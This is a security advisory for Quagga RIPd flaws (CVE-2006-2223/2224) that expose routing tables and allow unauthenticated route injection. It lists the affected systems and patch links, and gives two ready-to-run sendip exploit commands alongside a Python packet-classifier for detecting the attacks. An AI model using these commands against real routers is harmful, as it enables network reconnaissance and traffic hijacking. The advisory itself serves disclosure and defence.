Quagga Information Disclosure and Route Injection Vulnerabilities
BID:17808
Info
| Bugtraq ID: | 17808 |
| Class: | Access Validation Error |
| CVE: | CVE-2006-2223 CVE-2006-2224 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2006 12:00AM |
| Updated: | Mar 19 2015 09:41AM |
| Credit: | Konstantin V. Gavrilenko discovered these vulnerabilities. |
| Vulnerable: |
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.04 powerpc
Ubuntu Ubuntu Linux 5.04 i386
Ubuntu Ubuntu Linux 5.04 amd64
Trustix Secure Linux 3.0
SuSE SUSE Linux Enterprise Server 9
SuSE SUSE Linux Enterprise Server 10
SuSE SUSE Linux Enterprise Desktop 10
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SuSE Linux Open-Xchange 4.1
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Office Server
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Quagga Quagga Routing Software Suite 0.99.3
Quagga Quagga Routing Software Suite 0.98.5
Quagga Quagga Routing Software Suite 0.97.3
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1 |
| Not Vulnerable: | |
Discussion
Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced.
These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.
Quagga versions 0.98.5 and 0.99.3 are vulnerable to these issues; other versions may also be affected.
Exploit / POC
Attackers can use existing network utilities to exploit these issues. The following commands are sufficient to demonstrate these vulnerabilities.
To exploit the information-disclosure issue:
sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
To exploit the route-injection issue:
sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 2 -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100
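On a network where RIPv2 authentication is required, both packets above stand out from the RIP header alone, so they can be flagged from captured UDP/520 payloads. The following check is an added example, not part of the original advisory or of Quagga's code; the function names, the `auth_required` policy flag and the sample payloads are assumptions constructed for illustration, with the field layout taken from RFC 1058 and RFC 2453.

```python
import socket
import struct

RIP_REQUEST, RIP_RESPONSE = 1, 2
AFI_AUTH = 0xFFFF        # marks a RIPv2 authentication entry (RFC 2453)
METRIC_INFINITY = 16
ENTRY = "!HH4s4s4sI"     # AFI, route tag, address, mask, next hop, metric

def parse_rip(payload):
    """Split a UDP/520 payload into (command, version, entries)."""
    if len(payload) < 4 or (len(payload) - 4) % 20:
        raise ValueError("not a well-formed RIP packet")
    command, version = struct.unpack("!BB", payload[:2])
    entries = [struct.unpack(ENTRY, payload[i:i + 20])
               for i in range(4, len(payload), 20)]
    return command, version, entries

def classify(payload, auth_required=True):
    """Return findings for one packet; auth_required reflects local policy."""
    command, version, entries = parse_rip(payload)
    if not auth_required:
        return []
    findings = []
    authenticated = bool(entries) and entries[0][0] == AFI_AUTH
    if (command == RIP_REQUEST and len(entries) == 1
            and entries[0][0] == 0 and entries[0][5] == METRIC_INFINITY):
        findings.append("unauthenticated whole-table request")
    if command == RIP_RESPONSE and version == 1:
        findings.append("RIPv1 response where authentication is required")
    elif command == RIP_RESPONSE and not authenticated:
        findings.append("RIPv2 response without authentication entry")
    return findings

def entry(afi, addr="0.0.0.0", mask="0.0.0.0", metric=0):
    """Build one 20-byte route entry for the constructed samples below."""
    return struct.pack(ENTRY, afi, 0, socket.inet_aton(addr),
                       socket.inet_aton(mask), socket.inet_aton("0.0.0.0"),
                       metric)

# Constructed sample payloads (documentation addresses, not captured traffic).
V1_REQUEST = struct.pack("!BBH", 1, 1, 0) + entry(0, metric=16)
V1_RESPONSE = struct.pack("!BBH", 2, 1, 0) + entry(2, "192.0.2.0", metric=1)
V2_AUTH_RESPONSE = (struct.pack("!BBH", 2, 2, 0)
                    + struct.pack("!HH16s", AFI_AUTH, 2, b"placeholder")
                    + entry(2, "192.0.2.0", "255.255.255.0", 1))

if __name__ == "__main__":
    for name in ("V1_REQUEST", "V1_RESPONSE", "V2_AUTH_RESPONSE"):
        print(name, classify(globals()[name]))
```

Any finding on a segment configured for authenticated RIPv2 is worth alerting on, independently of whether the routers themselves have been patched.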
Solution / Fix
Solution:
The vendor has released patches to address these issues.
Please see the references for more information and vendor advisories.
Quagga Quagga Routing Software Suite 0.97.3
- Ubuntu quagga-doc_0.97.3-1ubuntu1.1_all.deb
  Ubuntu 5.04 (Hoary Hedgehog)
  http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.97.3-1ubuntu1.1_all.deb
- Ubuntu quagga_0.97.3-1ubuntu1.1_amd64.deb
  Ubuntu 5.04 (Hoary Hedgehog)
  http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_amd64.deb
- Ubuntu quagga_0.97.3-1ubuntu1.1_i386.deb
  Ubuntu 5.04 (Hoary Hedgehog)
  http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_i386.deb
- Ubuntu quagga_0.97.3-1ubuntu1.1_powerpc.deb
  Ubuntu 5.04 (Hoary Hedgehog)
  http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ubuntu1.1_powerpc.deb
Quagga Quagga Routing Software Suite 0.98.5
- Quagga Fixes for 0.98.x RIPd bugs 261 and 262
  http://bugzilla.quagga.net/attachment.cgi?id=84&action=view
Quagga Quagga Routing Software Suite 0.99.3
- Quagga Fixes for 0.99.x RIPd bugs 261 and 262
  http://bugzilla.quagga.net/attachment.cgi?id=83&action=view
References
References:
- Bugzilla Bug 261: arh200604-1: RIPd unauthenticated route table broadcast (Quagga)
- Bugzilla Bug 262: arh200604-2: RIPv1 route injection bypasses authentication (Quagga)
- Quagga Software Suite Homepage (Quagga)
- RHSA-2006:0525-5 - quagga security update (RedHat)
- RHSA-2006:0533-4 - zebra security update (RedHat)
- Quagga RIPD unauthenticated route injection ("Konstantin V. Gavrilenko")
- Quagga RIPD unauthenticated route table broadcast ("Konstantin V. Gavrilenko")
- Re: Quagga RIPD unauthenticated route injection (Paul Jakma)